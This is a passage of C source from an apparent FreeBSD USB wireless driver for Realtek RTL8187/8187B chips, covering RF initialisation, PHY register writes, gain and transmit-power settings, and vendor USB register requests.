urtw_8187_write_phy_ofdm_c(struct urtw_softc *sc, uint8_t addr, uint32_t data) { data = data & 0xff; return urtw_8187_write_phy(sc, addr, data); } static usb_error_t urtw_8187_write_phy_cck_c(struct urtw_softc *sc, uint8_t addr, uint32_t data) { data = data & 0xff; return urtw_8187_write_phy(sc, addr, data | 0x10000); } static usb_error_t urtw_8187_write_phy(struct urtw_softc *sc, uint8_t addr, uint32_t data) { uint32_t phyw; usb_error_t error; phyw = ((data << 8) | (addr | 0x80)); urtw_write8_m(sc, URTW_PHY_MAGIC4, ((phyw & 0xff000000) >> 24)); urtw_write8_m(sc, URTW_PHY_MAGIC3, ((phyw & 0x00ff0000) >> 16)); urtw_write8_m(sc, URTW_PHY_MAGIC2, ((phyw & 0x0000ff00) >> 8)); urtw_write8_m(sc, URTW_PHY_MAGIC1, ((phyw & 0x000000ff))); usb_pause_mtx(&sc->sc_mtx, 1); fail: return (error); } static usb_error_t urtw_8225_setgain(struct urtw_softc *sc, int16_t gain) { usb_error_t error; urtw_8187_write_phy_ofdm(sc, 0x0d, urtw_8225_gain[gain * 4]); urtw_8187_write_phy_ofdm(sc, 0x1b, urtw_8225_gain[gain * 4 + 2]); urtw_8187_write_phy_ofdm(sc, 0x1d, urtw_8225_gain[gain * 4 + 3]); urtw_8187_write_phy_ofdm(sc, 0x23, urtw_8225_gain[gain * 4 + 1]); fail: return (error); } static usb_error_t urtw_8225_usb_init(struct urtw_softc *sc) { uint8_t data; usb_error_t error; urtw_write8_m(sc, URTW_RF_PINS_SELECT + 1, 0); urtw_write8_m(sc, URTW_GPIO, 0); error = urtw_read8e(sc, 0x53, &data); if (error) goto fail; error = urtw_write8e(sc, 0x53, data | (1 << 7)); if (error) goto fail; urtw_write8_m(sc, URTW_RF_PINS_SELECT + 1, 4); urtw_write8_m(sc, URTW_GPIO, 0x20); urtw_write8_m(sc, URTW_GP_ENABLE, 0); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, 0x80); urtw_write16_m(sc, URTW_RF_PINS_SELECT, 0x80); urtw_write16_m(sc, URTW_RF_PINS_ENABLE, 0x80); usb_pause_mtx(&sc->sc_mtx, 500); fail: return (error); } static usb_error_t urtw_8225_write_c(struct urtw_softc *sc, uint8_t addr, uint16_t data) { uint16_t d80, d82, d84; usb_error_t error; urtw_read16_m(sc, URTW_RF_PINS_OUTPUT, &d80); d80 &= URTW_RF_PINS_MAGIC1; urtw_read16_m(sc, URTW_RF_PINS_ENABLE, &d82); urtw_read16_m(sc, URTW_RF_PINS_SELECT, &d84); d84 &= URTW_RF_PINS_MAGIC2; urtw_write16_m(sc, URTW_RF_PINS_ENABLE, d82 | URTW_RF_PINS_MAGIC3); urtw_write16_m(sc, URTW_RF_PINS_SELECT, d84 | URTW_RF_PINS_MAGIC3); DELAY(10); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, d80 | URTW_BB_HOST_BANG_EN); DELAY(2); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, d80); DELAY(10); error = urtw_8225_write_s16(sc, addr, 0x8225, &data); if (error != 0) goto fail; urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, d80 | URTW_BB_HOST_BANG_EN); DELAY(10); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, d80 | URTW_BB_HOST_BANG_EN); urtw_write16_m(sc, URTW_RF_PINS_SELECT, d84); usb_pause_mtx(&sc->sc_mtx, 2); fail: return (error); } static usb_error_t urtw_8225_write_s16(struct urtw_softc *sc, uint8_t addr, int index, uint16_t *data) { uint8_t buf[2]; uint16_t data16; struct usb_device_request req; usb_error_t error = 0; data16 = *data; req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = URTW_8187_SETREGS_REQ; USETW(req.wValue, addr); USETW(req.wIndex, index); USETW(req.wLength, sizeof(uint16_t)); buf[0] = (data16 & 0x00ff); buf[1] = (data16 & 0xff00) >> 8; error = urtw_do_request(sc, &req, buf); return (error); } static usb_error_t urtw_8225_rf_set_chan(struct urtw_softc *sc, int chan) { usb_error_t error; error = urtw_8225_set_txpwrlvl(sc, chan); if (error) goto fail; urtw_8225_write(sc, URTW_8225_ADDR_7_MAGIC, urtw_8225_channel[chan]); usb_pause_mtx(&sc->sc_mtx, 10); fail: return (error); } static usb_error_t urtw_8225_rf_set_sens(struct urtw_softc *sc, int sens) { usb_error_t error; if (sens < 0 || sens > 6) return -1; if (sens > 4) urtw_8225_write(sc, URTW_8225_ADDR_C_MAGIC, URTW_8225_ADDR_C_DATA_MAGIC1); else urtw_8225_write(sc, URTW_8225_ADDR_C_MAGIC, URTW_8225_ADDR_C_DATA_MAGIC2); sens = 6 - sens; error = urtw_8225_setgain(sc, sens); if (error) goto fail; urtw_8187_write_phy_cck(sc, 0x41, urtw_8225_threshold[sens]); fail: return (error); } static usb_error_t urtw_8225_set_txpwrlvl(struct urtw_softc *sc, int chan) { int i, idx, set; uint8_t *cck_pwltable; uint8_t cck_pwrlvl_max, ofdm_pwrlvl_min, ofdm_pwrlvl_max; uint8_t cck_pwrlvl = sc->sc_txpwr_cck[chan] & 0xff; uint8_t ofdm_pwrlvl = sc->sc_txpwr_ofdm[chan] & 0xff; usb_error_t error; cck_pwrlvl_max = 11; ofdm_pwrlvl_max = 25; /* 12 -> 25 */ ofdm_pwrlvl_min = 10; /* CCK power setting */ cck_pwrlvl = (cck_pwrlvl > cck_pwrlvl_max) ? cck_pwrlvl_max : cck_pwrlvl; idx = cck_pwrlvl % 6; set = cck_pwrlvl / 6; cck_pwltable = (chan == 14) ? urtw_8225_txpwr_cck_ch14 : urtw_8225_txpwr_cck; urtw_write8_m(sc, URTW_TX_GAIN_CCK, urtw_8225_tx_gain_cck_ofdm[set] >> 1); for (i = 0; i < 8; i++) { urtw_8187_write_phy_cck(sc, 0x44 + i, cck_pwltable[idx * 8 + i]); } usb_pause_mtx(&sc->sc_mtx, 1); /* OFDM power setting */ ofdm_pwrlvl = (ofdm_pwrlvl > (ofdm_pwrlvl_max - ofdm_pwrlvl_min)) ? ofdm_pwrlvl_max : ofdm_pwrlvl + ofdm_pwrlvl_min; ofdm_pwrlvl = (ofdm_pwrlvl > 35) ? 35 : ofdm_pwrlvl; idx = ofdm_pwrlvl % 6; set = ofdm_pwrlvl / 6; error = urtw_8185_set_anaparam2(sc, URTW_8225_ANAPARAM2_ON); if (error) goto fail; urtw_8187_write_phy_ofdm(sc, 2, 0x42); urtw_8187_write_phy_ofdm(sc, 6, 0); urtw_8187_write_phy_ofdm(sc, 8, 0); urtw_write8_m(sc, URTW_TX_GAIN_OFDM, urtw_8225_tx_gain_cck_ofdm[set] >> 1); urtw_8187_write_phy_ofdm(sc, 0x5, urtw_8225_txpwr_ofdm[idx]); urtw_8187_write_phy_ofdm(sc, 0x7, urtw_8225_txpwr_ofdm[idx]); usb_pause_mtx(&sc->sc_mtx, 1); fail: return (error); } static usb_error_t urtw_8225_rf_stop(struct urtw_softc *sc) { uint8_t data; usb_error_t error; urtw_8225_write(sc, 0x4, 0x1f); error = urtw_set_mode(sc, URTW_EPROM_CMD_CONFIG); if (error) goto fail; urtw_read8_m(sc, URTW_CONFIG3, &data); urtw_write8_m(sc, URTW_CONFIG3, data | URTW_CONFIG3_ANAPARAM_WRITE); if (sc->sc_flags & URTW_RTL8187B) { urtw_write32_m(sc, URTW_ANAPARAM2, URTW_8187B_8225_ANAPARAM2_OFF); urtw_write32_m(sc, URTW_ANAPARAM, URTW_8187B_8225_ANAPARAM_OFF); urtw_write32_m(sc, URTW_ANAPARAM3, URTW_8187B_8225_ANAPARAM3_OFF); } else { urtw_write32_m(sc, URTW_ANAPARAM2, URTW_8225_ANAPARAM2_OFF); urtw_write32_m(sc, URTW_ANAPARAM, URTW_8225_ANAPARAM_OFF); } urtw_write8_m(sc, URTW_CONFIG3, data & ~URTW_CONFIG3_ANAPARAM_WRITE); error = urtw_set_mode(sc, URTW_EPROM_CMD_NORMAL); if (error) goto fail; fail: return (error); } static usb_error_t urtw_8225v2_rf_init(struct urtw_softc *sc) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) int i; uint16_t data; uint32_t data32; usb_error_t error; error = urtw_8180_set_anaparam(sc, URTW_8225_ANAPARAM_ON); if (error) goto fail; error = urtw_8225_usb_init(sc); if (error) goto fail; urtw_write32_m(sc, URTW_RF_TIMING, 0x000a8008); urtw_read16_m(sc, URTW_BRSR, &data); /* XXX ??? */ urtw_write16_m(sc, URTW_BRSR, 0xffff); urtw_write32_m(sc, URTW_RF_PARA, 0x100044); error = urtw_set_mode(sc, URTW_EPROM_CMD_CONFIG); if (error) goto fail; urtw_write8_m(sc, URTW_CONFIG3, 0x44); error = urtw_set_mode(sc, URTW_EPROM_CMD_NORMAL); if (error) goto fail; error = urtw_8185_rf_pins_enable(sc); if (error) goto fail; usb_pause_mtx(&sc->sc_mtx, 500); for (i = 0; i < N(urtw_8225v2_rf_part1); i++) { urtw_8225_write(sc, urtw_8225v2_rf_part1[i].reg, urtw_8225v2_rf_part1[i].val); } usb_pause_mtx(&sc->sc_mtx, 50); urtw_8225_write(sc, URTW_8225_ADDR_0_MAGIC, URTW_8225_ADDR_0_DATA_MAGIC1); for (i = 0; i < 95; i++) { urtw_8225_write(sc, URTW_8225_ADDR_1_MAGIC, (uint8_t)(i + 1)); urtw_8225_write(sc, URTW_8225_ADDR_2_MAGIC, urtw_8225v2_rxgain[i]); } urtw_8225_write(sc, URTW_8225_ADDR_3_MAGIC, URTW_8225_ADDR_3_DATA_MAGIC1); urtw_8225_write(sc, URTW_8225_ADDR_5_MAGIC, URTW_8225_ADDR_5_DATA_MAGIC1); urtw_8225_write(sc, URTW_8225_ADDR_0_MAGIC, URTW_8225_ADDR_0_DATA_MAGIC2); urtw_8225_write(sc, URTW_8225_ADDR_2_MAGIC, URTW_8225_ADDR_2_DATA_MAGIC1); usb_pause_mtx(&sc->sc_mtx, 100); urtw_8225_write(sc, URTW_8225_ADDR_2_MAGIC, URTW_8225_ADDR_2_DATA_MAGIC2); usb_pause_mtx(&sc->sc_mtx, 100); error = urtw_8225_read(sc, URTW_8225_ADDR_6_MAGIC, &data32); if (error != 0) goto fail; if (data32 != URTW_8225_ADDR_6_DATA_MAGIC1) device_printf(sc->sc_dev, "expect 0xe6!! (0x%x)\n", data32); if (!(data32 & URTW_8225_ADDR_6_DATA_MAGIC2)) { urtw_8225_write(sc, URTW_8225_ADDR_2_MAGIC, URTW_8225_ADDR_2_DATA_MAGIC1); usb_pause_mtx(&sc->sc_mtx, 100); urtw_8225_write(sc, URTW_8225_ADDR_2_MAGIC, URTW_8225_ADDR_2_DATA_MAGIC2); usb_pause_mtx(&sc->sc_mtx, 50); error = urtw_8225_read(sc, URTW_8225_ADDR_6_MAGIC, &data32); if (error != 0) goto fail; if (!(data32 & URTW_8225_ADDR_6_DATA_MAGIC2)) device_printf(sc->sc_dev, "RF calibration failed\n"); } usb_pause_mtx(&sc->sc_mtx, 100); urtw_8225_write(sc, URTW_8225_ADDR_0_MAGIC, URTW_8225_ADDR_0_DATA_MAGIC6); for (i = 0; i < 128; i++) { urtw_8187_write_phy_ofdm(sc, 0xb, urtw_8225_agc[i]); urtw_8187_write_phy_ofdm(sc, 0xa, (uint8_t)i + 0x80); } for (i = 0; i < N(urtw_8225v2_rf_part2); i++) { urtw_8187_write_phy_ofdm(sc, urtw_8225v2_rf_part2[i].reg, urtw_8225v2_rf_part2[i].val); } error = urtw_8225v2_setgain(sc, 4); if (error) goto fail; for (i = 0; i < N(urtw_8225v2_rf_part3); i++) { urtw_8187_write_phy_cck(sc, urtw_8225v2_rf_part3[i].reg, urtw_8225v2_rf_part3[i].val); } urtw_write8_m(sc, URTW_TESTR, 0x0d); error = urtw_8225v2_set_txpwrlvl(sc, 1); if (error) goto fail; urtw_8187_write_phy_cck(sc, 0x10, 0x9b); urtw_8187_write_phy_ofdm(sc, 0x26, 0x90); /* TX ant A, 0x0 for B */ error = urtw_8185_tx_antenna(sc, 0x3); if (error) goto fail; urtw_write32_m(sc, URTW_HSSI_PARA, 0x3dc00002); error = urtw_8225_rf_set_chan(sc, 1); fail: return (error); #undef N } static usb_error_t urtw_8225v2_rf_set_chan(struct urtw_softc *sc, int chan) { usb_error_t error; error = urtw_8225v2_set_txpwrlvl(sc, chan); if (error) goto fail; urtw_8225_write(sc, URTW_8225_ADDR_7_MAGIC, urtw_8225_channel[chan]); usb_pause_mtx(&sc->sc_mtx, 10); fail: return (error); } static usb_error_t urtw_8225_read(struct urtw_softc *sc, uint8_t addr, uint32_t *data) { int i; int16_t bit; uint8_t rlen = 12, wlen = 6; uint16_t o1, o2, o3, tmp; uint32_t d2w = ((uint32_t)(addr & 0x1f)) << 27; uint32_t mask = 0x80000000, value = 0; usb_error_t error; urtw_read16_m(sc, URTW_RF_PINS_OUTPUT, &o1); urtw_read16_m(sc, URTW_RF_PINS_ENABLE, &o2); urtw_read16_m(sc, URTW_RF_PINS_SELECT, &o3); urtw_write16_m(sc, URTW_RF_PINS_ENABLE, o2 | URTW_RF_PINS_MAGIC4); urtw_write16_m(sc, URTW_RF_PINS_SELECT, o3 | URTW_RF_PINS_MAGIC4); o1 &= ~URTW_RF_PINS_MAGIC4; urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, o1 | URTW_BB_HOST_BANG_EN); DELAY(5); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, o1); DELAY(5); for (i = 0; i < (wlen / 2); i++, mask = mask >> 1) { bit = ((d2w & mask) != 0) ? 1 : 0; urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, bit | o1); DELAY(2); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, bit | o1 | URTW_BB_HOST_BANG_CLK); DELAY(2); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, bit | o1 | URTW_BB_HOST_BANG_CLK); DELAY(2); mask = mask >> 1; if (i == 2) break; bit = ((d2w & mask) != 0) ? 1 : 0; urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, bit | o1 | URTW_BB_HOST_BANG_CLK); DELAY(2); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, bit | o1 | URTW_BB_HOST_BANG_CLK); DELAY(2); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, bit | o1); DELAY(1); } urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, bit | o1 | URTW_BB_HOST_BANG_RW | URTW_BB_HOST_BANG_CLK); DELAY(2); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, bit | o1 | URTW_BB_HOST_BANG_RW); DELAY(2); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, o1 | URTW_BB_HOST_BANG_RW); DELAY(2); mask = 0x800; for (i = 0; i < rlen; i++, mask = mask >> 1) { urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, o1 | URTW_BB_HOST_BANG_RW); DELAY(2); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, o1 | URTW_BB_HOST_BANG_RW | URTW_BB_HOST_BANG_CLK); DELAY(2); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, o1 | URTW_BB_HOST_BANG_RW | URTW_BB_HOST_BANG_CLK); DELAY(2); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, o1 | URTW_BB_HOST_BANG_RW | URTW_BB_HOST_BANG_CLK); DELAY(2); urtw_read16_m(sc, URTW_RF_PINS_INPUT, &tmp); value |= ((tmp & URTW_BB_HOST_BANG_CLK) ? mask : 0); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, o1 | URTW_BB_HOST_BANG_RW); DELAY(2); } urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, o1 | URTW_BB_HOST_BANG_EN | URTW_BB_HOST_BANG_RW); DELAY(2); urtw_write16_m(sc, URTW_RF_PINS_ENABLE, o2); urtw_write16_m(sc, URTW_RF_PINS_SELECT, o3); urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, URTW_RF_PINS_OUTPUT_MAGIC1); if (data != NULL) *data = value; fail: return (error); } static usb_error_t urtw_8225v2_set_txpwrlvl(struct urtw_softc *sc, int chan) { int i; uint8_t *cck_pwrtable; uint8_t cck_pwrlvl_max = 15, ofdm_pwrlvl_max = 25, ofdm_pwrlvl_min = 10; uint8_t cck_pwrlvl = sc->sc_txpwr_cck[chan] & 0xff; uint8_t ofdm_pwrlvl = sc->sc_txpwr_ofdm[chan] & 0xff; usb_error_t error; /* CCK power setting */ cck_pwrlvl = (cck_pwrlvl > cck_pwrlvl_max) ? cck_pwrlvl_max : cck_pwrlvl; cck_pwrlvl += sc->sc_txpwr_cck_base; cck_pwrlvl = (cck_pwrlvl > 35) ? 35 : cck_pwrlvl; cck_pwrtable = (chan == 14) ? urtw_8225v2_txpwr_cck_ch14 : urtw_8225v2_txpwr_cck; for (i = 0; i < 8; i++) urtw_8187_write_phy_cck(sc, 0x44 + i, cck_pwrtable[i]); urtw_write8_m(sc, URTW_TX_GAIN_CCK, urtw_8225v2_tx_gain_cck_ofdm[cck_pwrlvl]); usb_pause_mtx(&sc->sc_mtx, 1); /* OFDM power setting */ ofdm_pwrlvl = (ofdm_pwrlvl > (ofdm_pwrlvl_max - ofdm_pwrlvl_min)) ? ofdm_pwrlvl_max : ofdm_pwrlvl + ofdm_pwrlvl_min; ofdm_pwrlvl += sc->sc_txpwr_ofdm_base; ofdm_pwrlvl = (ofdm_pwrlvl > 35) ? 35 : ofdm_pwrlvl; error = urtw_8185_set_anaparam2(sc, URTW_8225_ANAPARAM2_ON); if (error) goto fail; urtw_8187_write_phy_ofdm(sc, 2, 0x42); urtw_8187_write_phy_ofdm(sc, 5, 0x0); urtw_8187_write_phy_ofdm(sc, 6, 0x40); urtw_8187_write_phy_ofdm(sc, 7, 0x0); urtw_8187_write_phy_ofdm(sc, 8, 0x40); urtw_write8_m(sc, URTW_TX_GAIN_OFDM, urtw_8225v2_tx_gain_cck_ofdm[ofdm_pwrlvl]); usb_pause_mtx(&sc->sc_mtx, 1); fail: return (error); } static usb_error_t urtw_8225v2_setgain(struct urtw_softc *sc, int16_t gain) { uint8_t *gainp; usb_error_t error; /* XXX for A? */ gainp = urtw_8225v2_gain_bg; urtw_8187_write_phy_ofdm(sc, 0x0d, gainp[gain * 3]); usb_pause_mtx(&sc->sc_mtx, 1); urtw_8187_write_phy_ofdm(sc, 0x1b, gainp[gain * 3 + 1]); usb_pause_mtx(&sc->sc_mtx, 1); urtw_8187_write_phy_ofdm(sc, 0x1d, gainp[gain * 3 + 2]); usb_pause_mtx(&sc->sc_mtx, 1); urtw_8187_write_phy_ofdm(sc, 0x21, 0x17); usb_pause_mtx(&sc->sc_mtx, 1); fail: return (error); } static usb_error_t urtw_8225_isv2(struct urtw_softc *sc, int *ret) { uint32_t data; usb_error_t error; *ret = 1; urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, URTW_RF_PINS_MAGIC5); urtw_write16_m(sc, URTW_RF_PINS_SELECT, URTW_RF_PINS_MAGIC5); urtw_write16_m(sc, URTW_RF_PINS_ENABLE, URTW_RF_PINS_MAGIC5); usb_pause_mtx(&sc->sc_mtx, 500); urtw_8225_write(sc, URTW_8225_ADDR_0_MAGIC, URTW_8225_ADDR_0_DATA_MAGIC1); error = urtw_8225_read(sc, URTW_8225_ADDR_8_MAGIC, &data); if (error != 0) goto fail; if (data != URTW_8225_ADDR_8_DATA_MAGIC1) *ret = 0; else { error = urtw_8225_read(sc, URTW_8225_ADDR_9_MAGIC, &data); if (error != 0) goto fail; if (data != URTW_8225_ADDR_9_DATA_MAGIC1) *ret = 0; } urtw_8225_write(sc, URTW_8225_ADDR_0_MAGIC, URTW_8225_ADDR_0_DATA_MAGIC2); fail: return (error); } static usb_error_t urtw_8225v2b_rf_init(struct urtw_softc *sc) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) int i; uint8_t data8; usb_error_t error; error = urtw_set_mode(sc, URTW_EPROM_CMD_CONFIG); if (error) goto fail; /* * initialize extra registers on 8187 */ urtw_write16_m(sc, URTW_BRSR_8187B, 0xfff); /* retry limit */ urtw_read8_m(sc, URTW_CW_CONF, &data8); data8 |= URTW_CW_CONF_PERPACKET_RETRY; urtw_write8_m(sc, URTW_CW_CONF, data8); /* TX AGC */ urtw_read8_m(sc, URTW_TX_AGC_CTL, &data8); data8 |= URTW_TX_AGC_CTL_PERPACKET_GAIN; urtw_write8_m(sc, URTW_TX_AGC_CTL, data8); /* Auto Rate Fallback Control */ #define URTW_ARFR 0x1e0 urtw_write16_m(sc, URTW_ARFR, 0xfff); urtw_read8_m(sc, URTW_RATE_FALLBACK, &data8); urtw_write8_m(sc, URTW_RATE_FALLBACK, data8 | URTW_RATE_FALLBACK_ENABLE); urtw_read8_m(sc, URTW_MSR, &data8); urtw_write8_m(sc, URTW_MSR, data8 & 0xf3); urtw_read8_m(sc, URTW_MSR, &data8); urtw_write8_m(sc, URTW_MSR, data8 | URTW_MSR_LINK_ENEDCA); urtw_write8_m(sc, URTW_ACM_CONTROL, sc->sc_acmctl); urtw_write16_m(sc, URTW_ATIM_WND, 2); urtw_write16_m(sc, URTW_BEACON_INTERVAL, 100); #define URTW_FEMR_FOR_8187B 0x1d4 urtw_write16_m(sc, URTW_FEMR_FOR_8187B, 0xffff); /* led type */ urtw_read8_m(sc, URTW_CONFIG1, &data8); data8 = (data8 & 0x3f) | 0x80; urtw_write8_m(sc, URTW_CONFIG1, data8); /* applying MAC address again. */ urtw_write32_m(sc, URTW_MAC0, ((uint32_t *)sc->sc_bssid)[0]); urtw_write16_m(sc, URTW_MAC4, ((uint32_t *)sc->sc_bssid)[1] & 0xffff); error = urtw_set_mode(sc, URTW_EPROM_CMD_NORMAL); if (error) goto fail; urtw_write8_m(sc, URTW_WPA_CONFIG, 0); /* * MAC configuration */ for (i = 0; i < N(urtw_8225v2b_rf_part1); i++) urtw_write8_m(sc, urtw_8225v2b_rf_part1[i].reg, urtw_8225v2b_rf_part1[i].val); urtw_write16_m(sc, URTW_TID_AC_MAP, 0xfa50); urtw_write16_m(sc, URTW_INT_MIG, 0x0000); urtw_write32_m(sc, 0x1f0, 0); urtw_write32_m(sc, 0x1f4, 0); urtw_write8_m(sc, 0x1f8, 0); urtw_write32_m(sc, URTW_RF_TIMING, 0x4001); #define URTW_RFSW_CTRL 0x272 urtw_write16_m(sc, URTW_RFSW_CTRL, 0x569a); /* * initialize PHY */ error = urtw_set_mode(sc, URTW_EPROM_CMD_CONFIG); if (error) goto fail; urtw_read8_m(sc, URTW_CONFIG3, &data8); urtw_write8_m(sc, URTW_CONFIG3, data8 | URTW_CONFIG3_ANAPARAM_WRITE); error = urtw_set_mode(sc, URTW_EPROM_CMD_NORMAL); if (error) goto fail; /* setup RFE initial timing */ urtw_write16_m(sc, URTW_RF_PINS_OUTPUT, 0x0480); urtw_write16_m(sc, URTW_RF_PINS_SELECT, 0x2488); urtw_write16_m(sc, URTW_RF_PINS_ENABLE, 0x1fff); usb_pause_mtx(&sc->sc_mtx, 1100); for (i = 0; i < N(urtw_8225v2b_rf_part0); i++) { urtw_8225_write(sc, urtw_8225v2b_rf_part0[i].reg, urtw_8225v2b_rf_part0[i].val); usb_pause_mtx(&sc->sc_mtx, 1); } urtw_8225_write(sc, 0x00, 0x01b7); for (i = 0; i < 95; i++) { urtw_8225_write(sc, URTW_8225_ADDR_1_MAGIC, (uint8_t)(i + 1)); usb_pause_mtx(&sc->sc_mtx, 1); urtw_8225_write(sc, URTW_8225_ADDR_2_MAGIC, urtw_8225v2b_rxgain[i]); usb_pause_mtx(&sc->sc_mtx, 1); } urtw_8225_write(sc, URTW_8225_ADDR_3_MAGIC, 0x080); usb_pause_mtx(&sc->sc_mtx, 1); urtw_8225_write(sc, URTW_8225_ADDR_5_MAGIC, 0x004); usb_pause_mtx(&sc->sc_mtx, 1); urtw_8225_write(sc, URTW_8225_ADDR_0_MAGIC, 0x0b7); usb_pause_mtx(&sc->sc_mtx, 1); usb_pause_mtx(&sc->sc_mtx, 3000); urtw_8225_write(sc, URTW_8225_ADDR_2_MAGIC, 0xc4d); usb_pause_mtx(&sc->sc_mtx, 2000); urtw_8225_write(sc, URTW_8225_ADDR_2_MAGIC, 0x44d); usb_pause_mtx(&sc->sc_mtx, 1); urtw_8225_write(sc, URTW_8225_ADDR_0_MAGIC, 0x2bf); usb_pause_mtx(&sc->sc_mtx, 1); urtw_write8_m(sc, URTW_TX_GAIN_CCK, 0x03); urtw_write8_m(sc, URTW_TX_GAIN_OFDM, 0x07); urtw_write8_m(sc, URTW_TX_ANTENNA, 0x03); urtw_8187_write_phy_ofdm(sc, 0x80, 0x12); for (i = 0; i < 128; i++) { uint32_t addr, data; data = (urtw_8225z2_agc[i] << 8) | 0x0000008f; addr = ((i + 0x80) << 8) | 0x0000008e; urtw_8187_write_phy_ofdm(sc, data & 0x7f, (data >> 8) & 0xff); urtw_8187_write_phy_ofdm(sc, addr & 0x7f, (addr >> 8) & 0xff); urtw_8187_write_phy_ofdm(sc, 0x0e, 0x00); } urtw_8187_write_phy_ofdm(sc, 0x80, 0x10); for (i = 0; i < N(urtw_8225v2b_rf_part2); i++) urtw_8187_write_phy_ofdm(sc, i, urtw_8225v2b_rf_part2[i].val); urtw_write32_m(sc, URTW_8187B_AC_VO, (7 << 12) | (3 << 8) | 0x1c); urtw_write32_m(sc, URTW_8187B_AC_VI, (7 << 12) | (3 << 8) | 0x1c); urtw_write32_m(sc, URTW_8187B_AC_BE, (7 << 12) | (3 << 8) | 0x1c); urtw_write32_m(sc, URTW_8187B_AC_BK, (7 << 12) | (3 << 8) | 0x1c); urtw_8187_write_phy_ofdm(sc, 0x97, 0x46); urtw_8187_write_phy_ofdm(sc, 0xa4, 0xb6); urtw_8187_write_phy_ofdm(sc, 0x85, 0xfc); urtw_8187_write_phy_cck(sc, 0xc1, 0x88); fail: return (error); #undef N } static usb_error_t urtw_8225v2b_rf_set_chan(struct urtw_softc *sc, int chan) { usb_error_t error; error = urtw_8225v2b_set_txpwrlvl(sc, chan); if (error) goto fail; urtw_8225_write(sc, URTW_8225_ADDR_7_MAGIC, urtw_8225_channel[chan]); usb_pause_mtx(&sc->sc_mtx, 10); fail: return (error); } static usb_error_t urtw_8225v2b_set_txpwrlvl(struct urtw_softc *sc, int chan) { int i; uint8_t *cck_pwrtable; uint8_t cck_pwrlvl_max = 15; uint8_t cck_pwrlvl = sc->sc_txpwr_cck[chan] & 0xff; uint8_t ofdm_pwrlvl = sc->sc_txpwr_ofdm[chan] & 0xff; usb_error_t error; /* CCK power setting */ cck_pwrlvl = (cck_pwrlvl > cck_pwrlvl_max) ? ((sc->sc_flags & URTW_RTL8187B_REV_B) ? cck_pwrlvl_max : 22) : (cck_pwrlvl + ((sc->sc_flags & URTW_RTL8187B_REV_B) ? 0 : 7)); cck_pwrlvl += sc->sc_txpwr_cck_base; cck_pwrlvl = (cck_pwrlvl > 35) ? 35 : cck_pwrlvl; cck_pwrtable = (chan == 14) ? urtw_8225v2b_txpwr_cck_ch14 : urtw_8225v2b_txpwr_cck; if (sc->sc_flags & URTW_RTL8187B_REV_B) cck_pwrtable += (cck_pwrlvl <= 6) ? 0 : ((cck_pwrlvl <= 11) ? 8 : 16); else cck_pwrtable += (cck_pwrlvl <= 5) ? 0 : ((cck_pwrlvl <= 11) ? 8 : ((cck_pwrlvl <= 17) ? 16 : 24)); for (i = 0; i < 8; i++) urtw_8187_write_phy_cck(sc, 0x44 + i, cck_pwrtable[i]); urtw_write8_m(sc, URTW_TX_GAIN_CCK, urtw_8225v2_tx_gain_cck_ofdm[cck_pwrlvl] << 1); usb_pause_mtx(&sc->sc_mtx, 1); /* OFDM power setting */ ofdm_pwrlvl = (ofdm_pwrlvl > 15) ? ((sc->sc_flags & URTW_RTL8187B_REV_B) ? 17 : 25) : (ofdm_pwrlvl + ((sc->sc_flags & URTW_RTL8187B_REV_B) ? 2 : 10)); ofdm_pwrlvl += sc->sc_txpwr_ofdm_base; ofdm_pwrlvl = (ofdm_pwrlvl > 35) ? 35 : ofdm_pwrlvl; urtw_write8_m(sc, URTW_TX_GAIN_OFDM, urtw_8225v2_tx_gain_cck_ofdm[ofdm_pwrlvl] << 1); if (sc->sc_flags & URTW_RTL8187B_REV_B) { if (ofdm_pwrlvl <= 11) { urtw_8187_write_phy_ofdm(sc, 0x87, 0x60); urtw_8187_write_phy_ofdm(sc, 0x89, 0x60); } else { urtw_8187_write_phy_ofdm(sc, 0x87, 0x5c); urtw_8187_write_phy_ofdm(sc, 0x89, 0x5c); } } else { if (ofdm_pwrlvl <= 11) { urtw_8187_write_phy_ofdm(sc, 0x87, 0x5c); urtw_8187_write_phy_ofdm(sc, 0x89, 0x5c); } else if (ofdm_pwrlvl <= 17) { urtw_8187_write_phy_ofdm(sc, 0x87, 0x54); urtw_8187_write_phy_ofdm(sc, 0x89, 0x54); } else { urtw_8187_write_phy_ofdm(sc, 0x87, 0x50); urtw_8187_write_phy_ofdm(sc, 0x89, 0x50); } } usb_pause_mtx(&sc->sc_mtx, 1); fail: return (error); } static usb_error_t urtw_read8e(struct urtw_softc *sc, int val, uint8_t *data) { struct usb_device_request req; usb_error_t error; req.bmRequestType = UT_READ_VENDOR_DEVICE; req.bRequest = URTW_8187_GETREGS_REQ; USETW(req.wValue, val | 0xfe00); USETW(req.wIndex, 0); USETW(req.wLength, sizeof(uint8_t)); error = urtw_do_request(sc, &req, data); return (error); } static usb_error_t urtw_write8e(struct urtw_softc *sc, int val, uint8_t data) { struct usb_device_request req; req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = URTW_8187_SETREGS_REQ; USETW(req.wValue, val | 0xfe00); USETW(req.wIndex, 0); USETW(req.wLength, 